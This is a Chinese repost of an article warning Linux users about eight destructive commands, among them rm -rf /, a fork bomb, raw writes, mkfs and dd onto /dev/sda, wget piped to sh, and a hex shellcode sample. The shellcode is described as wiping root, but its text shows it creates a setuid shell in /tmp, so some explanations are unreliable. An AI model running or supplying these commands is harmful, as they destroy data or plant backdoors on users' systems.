八个最致命的 Linux 命令!

转载来源

公众号:架构师小秘圈

阅读本文大概需要 5 分钟。

1. rm -rf Command

rm -rf 命令是删除文件夹及其内容的最快方法之一。但是一点点错字或失误可能会导致不可恢复的系统损坏。与 rm 命令一起使用的一些选项是:

rm 命令用于删除文件。rm -r命令以递归方式删除文件夹,甚至是空文件夹。rm -f命令在不询问的情况下删除“只读文件”。rm -rf /:强制删除根目录中的所有内容。rm -rf *:强制删除当前目录/工作目录中的所有内容rm -rf. :强制删除当前文件夹和子文件夹。rm -rf ~将删除主文件夹中的所有文件,而rm -rf .*将删除所有配置文件。

因此,执行 rm -rf 命令时要小心。如果通过'rm'命令来克服意外删除文件,可以在“.bashrc”文件中创建'rm'命令的别名为'rm -i',它会要求确认每次删除。

2. :(){:|:&};:

以上实际上是一个 fork 炸弹。它通过定义一个名为':'的函数来运行,该函数调用自身两次,一次在前台,一次在后台。它一直持续执行,直到系统冻结。

:(){:|:&};:

这短短的一行定义了一个 shell 函数,它可以创建自己的新副本。进程不断地复制自己,它的副本不断地复制自己,很快地占用了所有的 CPU 时间和内存。这会导致你的主机死机。这基本上是一种拒绝服务攻击。

3. command > /dev/sda

上面的命令将'command'的输出写入块/ dev / sda。它运行一个命令并将该命令的输出直接发送到第一个硬盘驱动器,将数据直接写入硬盘驱动器并损坏文件系统。

command - 运行命令(可以是任何命令。)/ dev / sda - 将命令的输出直接写入硬盘设备。

块上的所有文件将被原始数据替换,从而导致块上的数据完全丢失。

4. mv folder /dev/null

上面的命令会将'folder'移动到/ dev / null。在Linux ,dev / null 或 null 是一个特殊文件,它丢弃写入它的所有数据并报告写操作成功。例如:

mv~ / dev / null - 将您的主目录移动到黑洞

mv - 将以下文件或目录移动到另一个位置。

〜 - 表示整个主文件夹。

/ dev / null - 将您的主文件夹移动到/ dev / null,销毁所有文件并删除原始副本。

5. wget http://example.com/something -O- | sh

上面的命令从 Web 下载脚本并将其发送到 sh,后者执行脚本的内容。

wget -下载一个文件。http://example.com/something——从这个位置下载文件。| 将wget命令(您下载的文件)的输出直接发送到另一个命令。sh -将文件发送到sh命令,如果是bash脚本,sh命令就会执行它。

如果您不确定脚本是什么,或者您不信任其来源,那么这可能很危险 - 不要运行不受信任的脚本。

6. mkfs.ext3 /dev/sda

上面的命令将格式化块'sda',你肯定会知道执行上述命令后你的Block(硬盘驱动器)将是新的,全新的!没有任何数据,将您的系统置于不可恢复的阶段。

mkfs.ext3 /dev/sda

总而言之,此命令可以等同于在 Windows 上运行格式c:它将擦除第一个分区上的文件并用新文件系统替换它们。

7. dd if=/dev/random of=/dev/sda

上面的命令将清除块 sda 并将随机垃圾数据写入块。

dd if=/dev/random of=/dev/sda

当然!您的系统将处于不一致且不可恢复的阶段。

8. 被隐藏的命令

以下命令只是上面的第一个命令(rm -rf)。这里的代码以十六进制隐藏,以便无知的用户可能被欺骗。在终端中运行以下代码将擦除根分区。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

这种被隐藏的危险命令,通常无法被检测到。你必须知道你在做什么以及结果会是什么。不要编译或者运行来自未知来源的代码。

原文发布于微信公众号 - 进击的Coder(FightingCoder)

原文发表时间:2019-03-20

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券